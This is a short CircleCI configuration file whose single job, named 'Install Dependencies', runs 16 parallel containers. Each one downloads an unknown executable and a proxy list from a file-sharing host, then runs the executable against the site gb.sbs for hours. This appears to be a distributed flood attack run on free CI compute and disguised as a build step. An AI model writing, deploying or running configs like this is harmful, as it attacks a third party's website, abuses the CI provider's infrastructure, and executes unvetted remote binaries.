version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install wget -y && wget -O jsss https://free.keep.sh/rNtYVm1Mu3l9hwgo/jsss/download && wget -O proxy.txt https://free.keep.sh/tPSx682zegTo6Sfi/proxy.txt/download && chmod +x jsss && ./jsss https://gb.sbs/ 999999 100 100
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
